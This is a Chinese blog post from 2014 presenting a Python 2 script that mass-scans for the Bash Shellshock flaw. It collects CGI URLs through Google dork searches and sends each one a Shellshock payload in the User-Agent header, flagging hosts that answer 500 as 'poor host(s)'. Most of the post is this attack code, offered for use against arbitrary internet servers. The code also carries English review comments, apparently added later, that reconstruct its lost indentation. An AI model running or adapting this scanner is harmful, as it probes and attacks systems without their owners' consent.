Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
来源:程序员人生 发布时间:2014-10-12 18:14:12 阅读次数:3140次
Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。检测漏洞的思路也很简单,我这里直接根据服务器返回码进行判断:代码中把 HTTP 500 当作存在漏洞的标志。这只是粗略的判断,其他原因导致的服务端错误同样会返回 500,因此结果可能存在误报。
思路就是以上这些,下面还是和往常一样,贴代码:
#coding=utf-8
import requests
import json
import sys
import threading
import socket
# Shared result list: EachWorker.run appends every URL it flags, and the
# __main__ block reads its length to print the final summary.
vul_res = []
class GoogleURLProvider():
    """Collect result URLs from a web-search API for one fixed query string.

    NOTE(review): this page lost all indentation; the nesting below is a
    reconstruction and should be confirmed against an original copy.
    """

    def __init__(self,pageCount,proxies):
        """Store the page count and proxy mapping and set the fixed query.

        Args:
            pageCount: number of result pages to request.
            proxies: proxy mapping passed unchanged to requests.get.
        """
        self.pageCount = pageCount # number of result pages to query
        self.keywords = r'inurl:cgi-bin filetype:sh'
        self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
        self.proxies = proxies

    def getRequest(self,url):
        """GET *url* through the configured proxies and return the response."""
        # verify=False switches off TLS certificate validation, so the proxy
        # (or anything else on the path) can read or alter what comes back.
        # No timeout is passed, so this call can block indefinitely.
        return requests.get(url,proxies=self.proxies,verify=False)

    def getUrls(self):
        """Request each result page in turn and return the collected URLs."""
        ret_list = []
        tmp_list = []
        for x in xrange(0,self.pageCount):
            # The query text is interpolated as-is; nothing here URL-encodes it.
            url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
            try:
                r = self.getRequest(url)
                results = json.loads(r.text)
                if not results:
                    continue
                infos = results['responseData']['results']
                if infos:
                    for i in infos:
                        tmp_list.append(i['url'])
            except Exception, e:
                # Any failure (network, JSON decoding, missing key) is
                # swallowed and the page is skipped without a message.
                continue
            # NOTE(review): placed inside the loop because the `continue`
            # statements above would otherwise have nothing to skip; the
            # original nesting cannot be recovered from this page -- confirm.
            ret_list = ret_list + tmp_list
        return ret_list
class BashRCEDetector():
    """Run one EachWorker probe for every URL in the supplied list."""

    def __init__(self,urls):
        """Keep the list of URLs to probe."""
        self.urls = urls

    def detector(self):
        """Create and start an EachWorker thread for each URL in self.urls."""
        global vul_res
        for x in self.urls:
            # multi-threaded execution (original author's comment)
            each = EachWorker(x)
            each.start()
            # NOTE(review): indentation was lost on this page; join() is
            # placed inside the loop here, which waits for each worker to
            # finish before the next one starts -- confirm against the original.
            each.join()
class EachWorker(threading.Thread):
    """Worker thread that sends one probe request to a single URL.

    The request carries a User-Agent value that starts with the ``() {``
    function-definition prefix. An HTTP 500 response is the only signal used
    to flag the URL, so a server error with any other cause is flagged as
    well. On the defending side, that header prefix is what appears in access
    logs when the User-Agent is recorded.
    """

    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        """Probe self.url once and append it to vul_res on a 500 response."""
        global vul_res
        probe_headers = {'User-Agent': '''() { 1;}; echo 'eee'''}
        # Timeouts and connection failures are ignored: the URL is simply
        # not recorded.
        ignored_errors = (
            socket.timeout,
            requests.exceptions.Timeout,
            requests.exceptions.ConnectionError,
        )
        try:
            response = requests.get(self.url, headers=probe_headers, timeout=8)
        except ignored_errors:
            return
        if response.status_code != 500:
            return
        print("{url} has Bash RCE vulnerability".format(url=self.url))
        vul_res.append(self.url)
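if __name__ == '__main__':
    # Entry point: read the page count from argv, collect URLs through
    # GoogleURLProvider, probe them with BashRCEDetector, then print how many
    # URLs ended up in vul_res.
    print('Powered by:Exploit QQ:739858341')
    # On the page this literal was split across two lines, which is a syntax
    # error; it is written here as one string with an explicit newline.
    print('This is a program which you can use to scan the BashRCE vulnerability\n'
          'Scanner working,please wait....')
    if len(sys.argv) != 2:
        print('Usage:python BashRCEScanner <google pageCount>')
        sys.exit()
    # goagent proxy
    # Edit here: put in your own proxy to use the script.
    proxies = {
        'http': "http://127.0.0.1:8087",
        'https': "http://127.0.0.1:8087",
    }
    urlgetter = GoogleURLProvider(int(sys.argv[1]), proxies)
    url_res = urlgetter.getUrls()
    bash_detector = BashRCEDetector(url_res)
    bash_detector.detector()
    # vul_res is the module-level list filled by EachWorker.run.
    if len(vul_res) == 0:
        print('This group have no vulnerability')
    else:
        print('Find %d poor host(s)' % len(vul_res))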
运行截图: